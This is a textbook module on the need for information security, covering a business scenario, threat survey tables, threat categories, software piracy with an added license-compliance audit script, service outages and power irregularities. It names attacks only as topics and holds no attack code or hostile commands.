Principles of Information Security 7E - Module 2


MODULE 2

The Need for Information Security

Upon completion of this material, you should be able to:
1 Discuss the need for information security
2 Explain why a successful information security program is the shared responsibility of the entire organization
3 List and describe the threats posed to information security and common attacks associated with those threats
4 List the common information security issues that result from poor software development efforts

Our bad neighbor makes us early stirrers, which is both healthful and good husbandry.
—William Shakespeare, King Henry, in Henry V, Act 4, Scene 1

Opening Scenario
Fred Chin, CEO of Sequential Label and Supply (SLS), leaned back in his leather chair and propped his feet up on the long
mahogany table in the conference room where the SLS Board of Directors had just adjourned from their quarterly meeting.
“What do you think about our computer security problem?” he asked Gladys Williams, the company’s chief information
officer (CIO). He was referring to the outbreak of a malicious worm on the company’s computer network the previous month.
Gladys replied, “I think we have a real problem, and we need to put together a real solution. We can’t sidestep this with
a quick patch like last time.” Six months ago, most of the systems on the company network had been infected with a virus
program that came from an employee’s personal USB drive. To prevent this from happening again, all users in the company
were now prohibited from using personal devices on corporate systems and networks.
Fred wasn’t convinced. “Can’t we just allocate additional funds to the next training budget?”
Gladys shook her head. “You’ve known for some time now that this business runs on technology. That’s why you hired me
as CIO. I’ve seen this same problem at other companies, and I’ve been looking into our information security issues. My staff and
I have some ideas to discuss with you. I’ve asked Charlie Moody to come in today to talk about it. He’s waiting to speak with us.”
When Charlie joined the meeting, Fred said, “Hello, Charlie. As you know, the Board of Directors met today. They received
a report on the costs and lost production from the malware outbreak last month, and they directed us to improve the security
of our technology. Gladys says you can help me understand what we need to do about it.”
“To start with,” Charlie said, “Instead of simply ramping up our antivirus solution or throwing resources at an endpoint
protection product, we need to start by developing a formal information security program. We need a thorough review of our
policies and practices, and we need to establish an ongoing risk management program. Then we can explore the technical
options we have. There are some other things that are part of the process as well, but this is where I think we should start.”

“Sounds like it is going to be complicated … and expensive,” said Fred.


Charlie looked at Gladys and then answered, “Well, there will probably be some extra expenses for specialized hardware
and software, and we may have to slow down some of our product development projects a bit, but this approach will call
more for a change in our attitude about security than just a spending spree. I don’t have accurate estimates yet, but you can
be sure we’ll put cost-benefit worksheets in front of you before we commit any funds.”
Fred thought about this for a few seconds. “Okay. What’s our next step?”
Gladys answered, “First, we need to initiate a project plan to develop our new information security program. We’ll use
our usual systems development and project management approach. There are a few differences, but we can easily adapt our
current models. We’ll need to reassign a few administrators to help Charlie with the new program. We’d also like a formal
statement to the entire company identifying Charlie as our new chief information security officer and asking all of the department heads to cooperate with his new information security initiatives.”
“Information security? What about computer security?” asked Fred.
Charlie responded, “Information security includes computer security, plus all the other things we use to do business:
securing our information, networks, operations, communications, personnel, and intellectual property. Even our paper records
need to be factored in.”
“I see,” Fred said. “Okay, Mr. Chief Information Security Officer.” Fred held out his hand for a congratulatory handshake.
“Bring me the draft project plan and budget in two weeks. The audit committee of the Board meets in four weeks, and we’ll
need to report our progress then.”

Introduction To The Need For Information Security

Unlike any other business or information technology program, the primary mission of an information security program is to ensure that information assets—information and the systems that house them—are protected and thus remain safe and useful. Organizations expend a lot of money and thousands of hours to maintain their information assets. If threats to these assets didn’t exist, those resources could be used exclusively to improve the systems that contain, use, and transmit the information. However, the threat of attacks on information assets is a constant concern, and the need for information security grows along with the sophistication of the attacks. While some organizations lump both information and systems under their definition of an information asset, others prefer to separate the true information-based assets (data, databases, data sets, and the applications that use data) from their media—the technologies that access, house, and carry the information. For our purposes, we will include both data and systems assets in our use of the term. Similarly, we’ll use the term information to describe both data and information, as for most organizations the terms can be used interchangeably.

Organizations must understand the environment in which information assets reside so their information security programs can address actual and potential problems. This module describes the environment and identifies the threats to it, the organization, and its information.

Information security performs four important functions for an organization:
• Protecting the organization’s ability to function
• Protecting the data and information the organization collects and uses, whether physical or electronic
• Enabling the safe operation of applications running on the organization’s IT systems
• Safeguarding the organization’s technology assets

Key term: information asset. The focus of information security; information that has value to the organization and the systems that store, process, and transmit the information.

Key term: media. As a subset of information assets, the systems, technologies, and networks that store, process, and transmit information.

Key term: data. Items of fact collected by an organization; includes raw numbers, facts, and words.

Key term: information. Data that has been organized, structured, and presented to provide additional insight into its context, worth, and usefulness.

Business Needs First


There is a long-standing saying in information security: When security needs and business needs collide, business wins.
Without the underlying business to generate revenue and use the information, the information may lose value, and
there would be no need for it. If the business cannot function, information security becomes less important. The key
is to balance the needs of the organization with the need to protect information assets, realizing that business needs
come first. This is not to say that information security should be casually ignored whenever there is a conflict, but to
stress that decisions associated with the degree to which information assets are protected should be made carefully,
considering both the business need to use the information and the need to protect it.

Protecting Functionality
The three communities of interest defined in Module 1—general management, IT management, and information security
management—are each responsible for facilitating the information security program that protects the organization’s
ability to function. Although many business and government managers shy away from addressing information security
because they perceive it to be a technically complex task, implementing information security has more to do with management than technology. Just as managing payroll involves management more than mathematical wage computations,
managing information security has more to do with risk management, policy, and its enforcement than the technology
of its implementation. As the noted information security author Charles Cresson Wood writes:
In fact, a lot of [information security] is good management for information technology. Many people think
that a solution to a technology problem is more technology. Well, not necessarily. … So a lot of my work, out
of necessity, has been trying to get my clients to pay more attention to information security as a management
issue in addition to a technical issue, information security as a people issue in addition to the technical issue.1
Each of an organization’s communities of interest must address information security in terms of business impact
and the cost of business interruption rather than isolating security as a technical problem.

Protecting Data That Organizations Collect and Use


Without data, an organization loses its record of transactions and its ability to deliver value to customers. Any business, educational institution, or government agency that operates within the modern context of connected and responsive services relies on information systems. Even when transactions are not online, information systems and the data they process enable the creation and movement of goods and services. Therefore, protecting data in transmission, in processing, and at rest (storage) is a critical aspect of information security. The value of data motivates attackers to steal, sabotage, or corrupt it. An effective information security program implemented by management protects the integrity and value of the organization’s data.

Organizations store much of the data they deem critical in databases, managed by specialized software known as a database management system (DBMS). Database security is accomplished by applying a broad range of control approaches common to many areas of information security. Securing databases encompasses most of the topics covered in this textbook, including managerial, technical, and physical controls. Managerial controls include policy, procedure, and governance. Technical controls used to secure databases rely on knowledge of access control, authentication, auditing, application security, backup and recovery, encryption, and integrity controls. Physical controls include the use of data centers with locking doors, fire suppression systems, video monitoring, and physical security guards.

The fundamental practices of information security have broad applicability in database security. One indicator of this strong degree of overlap is that the International Information System Security Certification Consortium (ISC)2, the organization that evaluates candidates for many prestigious information security certification programs, allows experience as a database administrator to count toward the experience requirement for the Certified Information Systems Security Professional (CISSP).

Key term: database. A collection of related data stored in a structured form and usually managed by specialized systems.

Enabling the Safe Operation of Applications


Today’s organizations are under immense pressure to acquire and operate integrated, efficient, and capable applications. A modern organization needs to create an environment that safeguards these applications, particularly those that are important elements of the organization’s infrastructure—operating system platforms, certain operational applications, electronic mail (e-mail), and instant messaging (IM) applications, like text messaging (short message service, or SMS). Organizations acquire these elements from a service provider, or they implement their own. Once an organization’s infrastructure is in place, management must continue to oversee it and not relegate its management to the IT department.

Key term: database security. A subset of information security that focuses on the assessment and protection of information stored in data repositories.

Safeguarding Technology Assets in Organizations


To perform effectively, organizations must employ secure infrastructure hardware appropriate to the size and scope of the enterprise. For instance, a small business may get by in its start-up phase using a small-scale firewall, such as a small office/home office (SOHO) device.

In general, as an organization grows to accommodate changing needs, more robust technology solutions should replace security technologies the organization has outgrown. An example of a robust solution is a commercial-grade, unified security architecture device, complete with intrusion detection and prevention systems, public key infrastructure (PKI), and virtual private network (VPN) capabilities. Modules 8 through 10 describe these technologies in more detail.

Information technology continues to add new capabilities and methods that allow organizations to solve business information management challenges. In recent years, we have seen the emergence of the Internet and the Web as new markets. Cloud-based services, which have created new ways to deliver IT services, have also brought new risks to organizational information, additional concerns about the ways these assets can be threatened, and concern for how they must be defended.

Information Security Threats And Attacks


Around 500 B.C., the Chinese general Sun Tzu Wu wrote The Art of War, a military treatise that emphasizes the importance of knowing yourself as well as the threats you face.2 To protect your organization’s information, you must (1) know yourself—that is, be familiar with the information to be protected and the systems that store, transport, and process it—and (2) know your enemy; in other words, the threats you face. To make sound decisions about information security, management must be informed about the various threats to an organization’s people, applications, data, and information systems. As discussed in Module 1, a threat represents a potential risk to an information asset, whereas an attack represents an ongoing act against the asset that could result in a loss. Threat agents damage or steal an organization’s information or physical assets by using exploits to take advantage of vulnerabilities where controls are not present or no longer effective. Unlike threats, which are always present, attacks exist only when a specific act may cause a loss. For example, the threat of damage from a thunderstorm is present throughout the summer in many places, but an attack and its associated risk of loss exist only for the duration of an actual thunderstorm. The following sections discuss each of the major types of threats and corresponding attacks facing modern information assets.

For more information on The Art of War, check out MIT’s Classics page at http://classics.mit.edu/Tzu/artwar.html.

To investigate the wide range of threats that pervade the interconnected world, many researchers have collected information on threats and attacks from practicing information security personnel and their organizations. While the categorizations may vary, threats are relatively well researched and understood.

4.8 Billion Potential Hackers


There is wide agreement that the threat from external sources increases when an organization connects to the Internet. The number of Internet users continues to grow; about 62 percent of the world’s almost 7.8 billion people—that is, more than 4.8 billion people—have some form of Internet access, a dramatic increase over the 49.2 percent reported as recently as 2015. Table 2-1 shows Internet usage by continent. Since the time this data was collected in mid-2020, the world population has continued to grow, with an expected increase in Internet usage. Therefore, a typical organization with an online connection to its systems and information faces an ever-increasing pool of potential hackers.

Key term: exploit. A technique used to compromise a system; may also describe the tool, program, or script used in the compromise.

Table 2-1 World Internet Usage3

World Regions | Population (2020 Est.) | Population % of World | Internet Users (6/30/2020) | Penetration Rate (% Pop.) | Growth 2000–2020 | Internet World %
Africa | 1,340,598,447 | 17.2% | 566,138,772 | 42.2% | 12,441% | 11.7%
Asia | 4,294,516,659 | 55.1% | 2,525,033,874 | 58.8% | 2,109% | 52.2%
Europe | 834,995,197 | 10.7% | 727,848,547 | 87.2% | 592% | 15.1%
Latin America/Caribbean | 654,287,232 | 8.4% | 467,817,332 | 71.5% | 2,489% | 9.7%
Middle East | 260,991,690 | 3.3% | 184,856,813 | 70.8% | 5,527% | 3.8%
North America | 368,869,647 | 4.7% | 332,908,868 | 90.3% | 208% | 6.9%
Oceania/Australia | 42,690,838 | 0.5% | 28,917,600 | 67.7% | 279% | 0.6%
WORLD TOTAL | 7,796,949,710 | 100.0% | 4,833,521,806 | 62.0% | 1,239% | 100.0%

Notes: Internet usage and world population estimates are as of July 20, 2020.

Other Studies of Threats


Several studies in recent years have examined the threats and attacks to information security. One of the most recent studies, conducted in 2015, found that 67.1 percent of responding organizations suffered malware infections. More than 98 percent of responding organizations identified malware attacks as a threat, with 58.7 percent indicating they were a significant or severe threat. Malware was identified as the second-highest threat source behind electronic phishing/spoofing.4

Table 2-2 shows these and other threats from internal stakeholders. Table 2-3 shows threats from external stakeholders. Table 2-4 shows general threats to information assets.

Table 2-2 Rated Threats from Internal Sources in 2015 SEC/CISE Survey of Threats to Information Protection5

Rating scale: 1 = Not a Threat through 5 = A Severe Threat; Comp. Rank = composite rank.

From Employees or Internal Stakeholders | 1 | 2 | 3 | 4 | 5 | Comp. Rank
Inability/unwillingness to follow established policy | 6.6% | 17.2% | 33.6% | 26.2% | 16.4% | 66%
Disclosure due to insufficient training | 8.1% | 23.6% | 29.3% | 25.2% | 13.8% | 63%
Unauthorized access or escalation of privileges | 4.8% | 24.0% | 31.2% | 31.2% | 8.8% | 63%
Unauthorized information collection/data sniffing | 6.4% | 26.4% | 40.0% | 17.6% | 9.6% | 60%
Theft of on-site organizational information assets | 10.6% | 32.5% | 34.1% | 12.2% | 10.6% | 56%
Theft of mobile/laptop/tablet and related/connected information assets | 15.4% | 29.3% | 28.5% | 17.9% | 8.9% | 55%
Intentional damage or destruction of information assets | 22.3% | 43.0% | 18.2% | 13.2% | 3.3% | 46%
Theft or misuse of organizationally leased, purchased, or developed software | 29.6% | 33.6% | 21.6% | 10.4% | 4.8% | 45%
Web site defacement | 43.4% | 33.6% | 16.4% | 4.9% | 1.6% | 38%
Blackmail of information release or sales | 43.5% | 37.1% | 10.5% | 6.5% | 2.4% | 37%

Table 2-3 Rated Threats from External Sources in 2015 SEC/CISE Survey of Threats to Information Protection6

Rating scale: 1 = Not a Threat through 5 = A Severe Threat; Comp. Rank = composite rank.

From Outsiders or External Stakeholders | 1 | 2 | 3 | 4 | 5 | Comp. Rank
Unauthorized information collection/data sniffing | 6.4% | 14.4% | 21.6% | 32.8% | 24.8% | 71%
Unauthorized access or escalation of privileges | 7.4% | 14.0% | 26.4% | 31.4% | 20.7% | 69%
Web site defacement | 8.9% | 23.6% | 22.8% | 26.8% | 17.9% | 64%
Intentional damage or destruction of information assets | 14.0% | 32.2% | 18.2% | 24.8% | 10.7% | 57%
Theft of mobile/laptop/tablet and related/connected information assets | 20.5% | 25.4% | 26.2% | 15.6% | 12.3% | 55%
Theft of on-site organizational information assets | 21.1% | 24.4% | 25.2% | 17.9% | 11.4% | 55%
Blackmail of information release or sales | 31.1% | 30.3% | 14.8% | 14.8% | 9.0% | 48%
Disclosure due to insufficient training | 34.5% | 21.8% | 22.7% | 13.4% | 7.6% | 48%
Inability/unwillingness to follow established policy | 33.6% | 29.4% | 18.5% | 6.7% | 11.8% | 47%
Theft or misuse of organizationally leased, purchased, or developed software | 31.7% | 30.1% | 22.8% | 9.8% | 5.7% | 46%

Table 2-4 Perceived Threats to Information Assets in 2015 SEC/CISE Survey of Threats to Information Protection7

Rating scale: 1 = Not a Threat through 5 = A Severe Threat; Comp. Rank = composite rank.

General Threats to Information Assets | 1 | 2 | 3 | 4 | 5 | Comp. Rank
Electronic phishing/spoofing attacks | 0.8% | 13.1% | 16.4% | 32.0% | 37.7% | 79%
Malware attacks | 1.7% | 12.4% | 27.3% | 36.4% | 22.3% | 73%
Unintentional employee/insider mistakes | 2.4% | 17.1% | 26.8% | 35.8% | 17.9% | 70%
Loss of trust due to information loss | 4.1% | 18.9% | 27.0% | 22.1% | 27.9% | 70%
Software failures or errors due to unknown vulnerabilities in externally acquired software | 5.6% | 18.5% | 28.2% | 33.9% | 13.7% | 66%
Social engineering of employees/insiders based on social media information | 8.1% | 14.6% | 32.5% | 34.1% | 10.6% | 65%
Social engineering of employees/insiders based on other published information | 8.9% | 19.5% | 24.4% | 32.5% | 14.6% | 65%
Software failures or errors due to poorly developed, internally created applications | 7.2% | 21.6% | 24.0% | 32.0% | 15.2% | 65%
SQL injections | 7.6% | 17.6% | 31.9% | 29.4% | 13.4% | 65%
Social engineering of employees/insiders based on organization’s Web sites | 11.4% | 19.5% | 23.6% | 31.7% | 13.8% | 63%
Denial of service (and distributed DoS) attacks | 8.2% | 23.0% | 27.9% | 32.8% | 8.2% | 62%
Software failures or errors due to known vulnerabilities in externally acquired software | 8.9% | 23.6% | 26.8% | 35.8% | 4.9% | 61%
Outdated organizational software | 8.1% | 28.2% | 26.6% | 26.6% | 10.5% | 61%
Loss of trust due to representation as source of phishing/spoofing attack | 9.8% | 23.8% | 30.3% | 23.0% | 13.1% | 61%
Loss of trust due to Web defacement | 12.4% | 30.6% | 31.4% | 19.8% | 5.8% | 55%
Outdated organizational hardware | 17.2% | 34.4% | 32.8% | 12.3% | 3.3% | 50%
Outdated organization data format | 18.7% | 35.8% | 26.8% | 13.8% | 4.9% | 50%
Inability/unwillingness to establish effective policy by management | 30.4% | 26.4% | 24.0% | 13.6% | 5.6% | 48%
Hardware failures or errors due to aging equipment | 19.5% | 39.8% | 24.4% | 14.6% | 1.6% | 48%
Hardware failures or errors due to defective equipment | 17.9% | 48.0% | 24.4% | 8.1% | 1.6% | 46%
Deviations in quality of service from other provider | 25.2% | 38.7% | 25.2% | 7.6% | 3.4% | 45%
Deviations in quality of service from data communications provider/ISP | 26.4% | 39.7% | 23.1% | 7.4% | 3.3% | 44%
Deviations in quality of service from telecommunications provider/ISP (if different from data provider) | 29.9% | 38.5% | 18.8% | 9.4% | 3.4% | 44%
Loss due to other natural disaster | 31.0% | 37.9% | 23.3% | 6.9% | 0.9% | 42%
Loss due to fire | 26.2% | 49.2% | 21.3% | 3.3% | 0.0% | 40%
Deviations in quality of service from power provider | 36.1% | 43.4% | 12.3% | 5.7% | 2.5% | 39%
Loss due to flood | 33.9% | 43.8% | 19.8% | 1.7% | 0.8% | 38%
Loss due to earthquake | 41.7% | 35.8% | 15.0% | 6.7% | 0.8% | 38%

Common Attack Pattern Enumeration and Classification (CAPEC)

A tool that security professionals can use to understand attacks is the Common Attack Pattern Enumeration and Classification (CAPEC) Web site hosted by Mitre—a nonprofit research and development organization sponsored by the U.S. government. This online repository can be searched for characteristics of a particular attack or simply browsed by professionals who want additional knowledge of how attacks occur procedurally.

For more information on CAPEC, visit http://capec.mitre.org, where contents can be downloaded or viewed online.

The 12 Categories Of Threats


The scheme shown in Table 2-5 consists of 12 general categories of threats that represent a clear and present danger
to an organization’s people, information, and systems. Each organization must prioritize the threats it faces based on
the particular security situation in which it operates, its organizational strategy regarding risk, and the exposure levels
of its assets. Module 4 covers these topics in more detail. You may notice that many of the attack examples in Table 2-5
could be listed in more than one category. For example, an attack performed by a hacker to steal customer data falls
into the category of “theft,” but it can also be preceded by “espionage or trespass,” as the hacker illegally accesses
the information. The theft may also be accompanied by Web site defacement actions to delay discovery, qualifying it
for the category of “sabotage or vandalism.” As mentioned in Module 1, these are technically threat sources, but for
simplicity’s sake, they are described here as threats.

Compromises to Intellectual Property


Many organizations create or support the development of intellectual property (IP) as part of their business operations. (You will learn more about IP in Module 6.) IP includes trade secrets, copyrights, trademarks, and patents. IP is protected by copyright law and other laws, carries the expectation of proper attribution or credit to its source, and potentially requires the acquisition of permission for its use, as specified in those laws. For example, use of some IP may require specific payments or royalties before a song can be used in a movie or before the distribution of a photo in a publication.

The unauthorized appropriation of IP constitutes a threat to information security—for example, when employees take an idea they developed at work and use it to make money for themselves. Employees may have access privileges to a variety of IP, including purchased and developed software and organizational information, as many employees typically need to use IP to conduct day-to-day business.

Key term: intellectual property (IP). Original ideas and inventions created, owned, and controlled by a particular person or organization; IP includes the representation of original ideas.

Software Piracy

Organizations often purchase or lease the IP of other organizations and must abide by a purchase or licensing agreement for its fair and responsible use. The most common IP breach is software piracy. Because most software is licensed to an individual user, its use is restricted to a single installation or to a designated user in an organization. If a user copies the program to another computer without securing another license or transferring the license, the user has violated the copyright. The nearby feature describes a classic case of this type of copyright violation. While you may note that the example is from 1997, which seems a long time ago, it illustrates that the issue remains significant today.

Key term: software piracy. The unauthorized duplication, installation, or distribution of copyrighted computer software, which is a violation of intellectual property.

Table 2-5 The 12 Categories of Threats to Information Security8

Category of Threat | Attack Examples
Compromises to intellectual property | Piracy, copyright infringement
Deviations in quality of service | Internet service provider (ISP), power, or WAN service problems
Espionage or trespass | Unauthorized access and/or data collection
Forces of nature | Fire, floods, earthquakes, lightning
Human error or failure | Accidents, employee mistakes
Information extortion | Blackmail, information disclosure
Sabotage or vandalism | Destruction of systems or information
Software attacks | Viruses, worms, macros, denial of service
Technical hardware failures or errors | Equipment failure
Technical software failures or errors | Bugs, code problems, unknown loopholes
Technological obsolescence | Antiquated or outdated technologies
Theft | Illegal confiscation of equipment or information
Software licenses are strictly enforced by regulatory and private organizations, and software publishers use several control mechanisms to prevent copyright infringement. In addition to laws against software piracy, two watchdog organizations investigate allegations of software abuse: the Software and Information Industry Association (SIIA) at www.siia.net, formerly known as the Software Publishers Association, and the Business Software Alliance (BSA) at www.bsa.org. BSA estimates that approximately 37 percent of software installed on personal computers globally, as reported in the 2018 findings, was not properly licensed. This number is only slightly lower than the 39 percent reported in the 2016 BSA global study; however, the majority of countries in the study indicate unlicensed rates in excess of 50 percent. Furthermore, BSA estimates an increased risk of malware for systems using unlicensed software.9 Figure 2-1 shows the BSA’s software piracy reporting Web site.
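The single-installation and designated-user rules described above are what a license audit actually checks: does the number of copies in use exceed the seats the organization purchased? The following Python script is an added example written for this module; it is not code from the textbook, from BSA, or from SIIA. It reconciles a constructed installation inventory against constructed license entitlements (all product, host, and user names are hypothetical) and flags any product that is deployed beyond its purchased seats or that has no license on record at all, which is the kind of finding an internal self-audit would want to surface before an outside auditor does.

```python
"""License compliance check: reconcile installations against purchased seats.

Added example, not from the textbook. Inventory and entitlement records are
constructed sample data; product, host, and user names are hypothetical.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Entitlement:
    product: str
    seats: int        # installations (or named users) the license permits
    per_user: bool    # True: licensed to a designated user; False: per installation


@dataclass(frozen=True)
class Installation:
    host: str
    product: str
    user: str         # primary user of the machine, as reported by inventory


# Constructed entitlements, as they might come from procurement records.
ENTITLEMENTS = [
    Entitlement("DiagramPro", seats=2, per_user=False),
    Entitlement("StatSuite", seats=3, per_user=True),
    Entitlement("CodeForge", seats=1, per_user=False),
]

# Constructed inventory, as it might come from an endpoint management tool.
INSTALLATIONS = [
    Installation("lab-01", "DiagramPro", "alice"),
    Installation("lab-02", "DiagramPro", "bob"),
    Installation("lab-03", "DiagramPro", "carol"),  # third copy on a 2-seat license
    Installation("fac-01", "StatSuite", "dave"),
    Installation("fac-02", "StatSuite", "dave"),    # same user, two machines: fine per user
    Installation("fac-03", "StatSuite", "erin"),
    Installation("dev-01", "CodeForge", "frank"),
    Installation("dev-02", "ShadowEdit", "frank"),  # no license on record at all
]


def reconcile(entitlements, installations):
    """Return {product: (used, allowed)} for every product that is over-deployed
    or unlicensed. Per-installation licenses are counted by distinct host,
    per-user licenses by distinct user. Products within their seat count are omitted."""
    by_product = {e.product: e for e in entitlements}
    hosts = defaultdict(set)
    users = defaultdict(set)
    for inst in installations:
        hosts[inst.product].add(inst.host)
        users[inst.product].add(inst.user)

    findings = {}
    for product in sorted(hosts):
        ent = by_product.get(product)
        if ent is None:
            # Installed software with no entitlement: allowed count is 0.
            findings[product] = (len(hosts[product]), 0)
            continue
        used = len(users[product]) if ent.per_user else len(hosts[product])
        if used > ent.seats:
            findings[product] = (used, ent.seats)
    return findings


def report(findings):
    """Render findings as one human-readable line per product."""
    lines = []
    for product, (used, allowed) in findings.items():
        if allowed == 0:
            lines.append(f"{product}: {used} installation(s), no license on record")
        else:
            lines.append(f"{product}: {used} in use, {allowed} licensed (over by {used - allowed})")
    return lines


if __name__ == "__main__":
    for line in report(reconcile(ENTITLEMENTS, INSTALLATIONS)):
        print(line)
```

Per-installation products are counted by host and per-user products by distinct user, which is why the two machines belonging to the one StatSuite user raise no finding while the third DiagramPro copy does. In practice the inventory would be exported from an endpoint management tool and the entitlements from procurement records, and the findings would feed the remediation steps the feature box describes: removing unlicensed copies or buying the missing seats.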

Source: Business Software Alliance. Used with permission.

Figure 2-1 BSA’s software piracy reporting Web site

Copyright Protection and User Registration


A number of technical mechanisms—digital watermarks, embedded code, copyright codes, and even the intentional placement of bad sectors on software media—have been used to enforce copyright laws. The most common tool is a unique software registration code in combination with an end-user license agreement (EULA) that usually pops up during the installation of new software, requiring users to indicate that they have read and agree to conditions of the software’s use. Figure 2-2 shows a license agreement from Microsoft for an Office 365 subscription.10

Source: Microsoft. Used with permission.


Figure 2-2 Microsoft Office software license terms

Another effort to combat piracy is online registration. Users who install software are often asked or even required to register their software to complete the installation, obtain technical support, or gain the use of all features. Some users believe that this process compromises personal privacy because they never know exactly what information is obtained from their computers and sent to the software manufacturer. Figure 2-3 shows an example of online software registration from the Steam game client. Steam requires the user to create an account and log in to it before registering software.

Intellectual property losses may result from the successful exploitation of vulnerabilities in asset protection controls. Many of the threats against these controls are described in this module.

Source: Steam Online. Used with permission.

Figure 2-3 Steam subscriber agreement and product registration



Violating Software Licenses


Adapted from “Bootlegged Software Could Cost Community College”11
By Natalie Patton, Las Vegas Review Journal, September 18, 1997
Ever heard of the software police? The Washington-based Software Publishers Association (SPA) copyright watchdogs were
tipped off that a community college in Las Vegas, Nevada, was using copyrighted software in violation of the software
licenses. The SPA spent months investigating the report. Academic Affairs Vice President Robert Silverman said the college
was prepared to pay some license violation fines, but was unable to estimate the total amount of the fines. The college cut
back on new faculty hires and set aside more than $1.3 million in anticipation of the total cost.
The audit was intensive, and it examined every computer on campus, including faculty machines, lab machines, and the
college president’s computer. Peter Beruk, SPA’s director of domestic antipiracy cases, said the decision to audit a reported
violation is only made when there is overwhelming evidence to win a lawsuit, as the SPA has no policing authority and can only
bring civil actions. Most investigated organizations settle out of court and agree to pay the fines to avoid costly court battles.
The process begins with an anonymous tip, usually from someone inside the organization. Of the hundreds of tips the
SPA receives each week, only a handful are selected for on-site visits. If the audited organizations have license violations,
they are required to destroy illegal software copies, repurchase software they want to keep (at double the retail price), and
pay the proper licensing fees for the software they used illegally.
In this case, the community college president suggested the blame for the college’s violations belonged to faculty and
students who may have downloaded illegal copies of software from the Internet or installed software on campus computers
without permission. Some of the faculty suspected that the problem lay with the qualifications and credibility of the campus
technology staff. The president promised to put additional staff and rules in place to prevent future license violations.

Deviations in Quality of Service


An organization’s information system depends on the successful operation of many interdependent support systems,
including power grids, data and telecommunications networks, parts suppliers, service vendors, and even janitorial
staff and garbage haulers. Any of these support systems can be interrupted by severe weather, intentional or acciden-
tal employee actions, or other unforeseen events. Deviations in quality of service can result from such accidents as a
backhoe taking out the organization’s Internet connection or phone lines. The backup provider may be online and in
service but may be able to supply only a fraction of the bandwidth the organization needs for full service. This deg-
radation of service is a form of availability disruption. Irregularities in Internet service, communications, and power
supplies can dramatically affect the availability of information and systems.

Internet Service Issues


In organizations that rely heavily on the Internet and the World Wide Web to support continued operations, ISP failures can considerably undermine the availability of information. Many organizations have sales staff and telecommuters working at remote locations. When these off-site employees cannot contact the host systems, they must use manual procedures to continue operations. The U.S. government's Federal Communications Commission (FCC) maintains a Network Outage Reporting System (NORS), which, under FCC regulation 47 C.F.R. Part 4, requires communications providers to report outages that disrupt communications at certain facilities, like emergency services and airports.

When an organization places its Web servers in the care of a Web hosting provider, that provider assumes responsibility for all Internet services and for the hardware and operating system software used to operate the Web site. These Web hosting services are usually arranged with a service level agreement (SLA). When a service provider fails to meet the terms of the SLA, the provider may accrue fines to cover losses incurred by the client, but these payments seldom cover the losses generated by the outage. Vendors may promote high availability or uptime (or low downtime), but Figure 2-4 shows that even an availability that seems acceptably high can cost the average organization a great deal. In August 2013, for example, the Amazon.com Web site went down for 30 to 40 minutes, costing the company an estimated $3 million to $4 million. Another widely reported disruption was the Mirai botnet attack of October 2016, a massive distributed denial-of-service attack against the DNS provider Dyn that left many major Web sites unreachable from parts of Europe and the United States.

availability disruption: An interruption or disruption in service, usually from a service provider, which causes an adverse event within an organization.
service level agreement (SLA): A document or part of a document that specifies the expected level of service from a service provider, including provisions for minimum acceptable availability and penalties or remediation procedures for downtime.
uptime: The percentage of time a particular service is available.
downtime: The percentage of time a particular service is not available.

i If you suspect that a widely used Internet service is down, you can check its status at https://downdetector.com/.

[Figure 2-4, upper panel: a bar chart titled "What are the top causes of downtime?" with bars of 40%, 25%, 19%, 17%, 15%, 13%, 9%, 5%, 4%, 3%, 3%, and 1%. The category labels were printed vertically and survive only as fragments (hardware failure, human error, software failure, network failure, power, fire, flood, hurricane, tornado, terrorism, and other can be made out), so the pairing of labels to percentages is not recoverable from the extracted text.]

Figure 2-4, lower panel: Breakdown of downtime

Availability   Hours unavailable per year   Cost at $12,500 per hour (avg. for SMBs)   Cost at $212,100 per hour (avg. for all businesses)
99.5%          43.92                        $549,000                                   $9,315,432
99.9%          8.76                         $109,500                                   $1,857,996
99.95%         4.38                         $54,750                                    $928,998
99.99%         0.53                         $10,950                                    $185,800
99.999%        0.05                         $1,096                                     $18,594

Note: each dollar figure is the hours column multiplied by the hourly rate. For the last two rows the published hour values do not agree with the published costs, which correspond to roughly 0.88 and 0.09 hours (0.01% and 0.001% of an 8,760-hour year).

Source: Fusion Connect. Used with permission.

Figure 2-4 Average cost of downtime according to Fusion Connect12



Communications and Other Service Provider Issues


Other utility services can affect organizations as well. Among these are telephone, water, wastewater, trash pickup, cable television, natural or propane gas, and custodial services. The loss of these services can impair the ability of an organization to function. For instance, most facilities require water service to operate an air-conditioning system. Even in Minnesota in February, air-conditioning systems help keep a modern facility operating. If a wastewater system fails, an organization might be prevented from allowing employees into the building. While several online utilities allow an organization to compare pricing options from various service providers, only a few show a comparative analysis of availability or downtime.

Power Irregularities

Irregularities from power utilities are common and can lead to fluctuations such as power excesses, power shortages, and power losses. These fluctuations can pose problems for organizations that provide inadequately conditioned power for their information systems equipment. In the United States, we are supplied 120-volt, 60-hertz (60-cycle) power, usually through 15- and 20-amp circuits. Europe as well as most of Africa, Asia, South America, and Australia use 230-volt, 50-hertz power. With the prevalence of global travel by organizational employees, failure to properly adapt to different voltage levels can damage computing equipment, resulting in a loss. When power voltage levels vary from normal, expected levels, such as during a blackout, brownout, fault, noise, sag, spike, or surge, an organization's sensitive electronic equipment, especially networking equipment, computers, and computer-based systems, which are vulnerable to fluctuations, can be easily damaged or destroyed. With small computers and network systems, power-conditioning options such as surge suppressors can smooth out spikes. The more expensive uninterruptible power supply (UPS) can protect against spikes and surges as well as sags and even blackouts of limited duration. A surge suppressor does nothing for a sag or an outage, and a UPS only covers the minutes its battery lasts, so critical systems still need an orderly shutdown procedure or a generator behind the UPS.

blackout: A long-term interruption (outage) in electrical power availability.
brownout: A long-term decrease in quality of electrical power availability.
fault: A short-term interruption in electrical power availability.
noise: The presence of additional and disruptive signals in network communications or electrical power delivery.
sag: A short-term decrease in electrical power availability.
spike: A short-term increase in electrical power availability, also known as a swell.
surge: A long-term increase in electrical power availability.

Espionage or Trespass

Espionage or trespass is a well-known and broad category of electronic and human activities that can breach the confidentiality of information. When an unauthorized person gains access to information an organization is trying to protect, the act is categorized as espionage or trespass. Attackers can use many different methods to access the information stored in an information system. Some information-gathering techniques are legal, for example, using a Web browser to perform market research. These legal techniques are collectively called competitive intelligence. When information gatherers employ techniques that cross a legal or ethical threshold, they are conducting industrial espionage. Many countries that are considered allies of the United States engage in industrial espionage against American organizations. When foreign governments are involved, these activities are considered espionage and a threat to national security.

competitive intelligence: The collection and analysis of information about an organization's business competitors through legal and ethical means to gain business intelligence and competitive advantage.
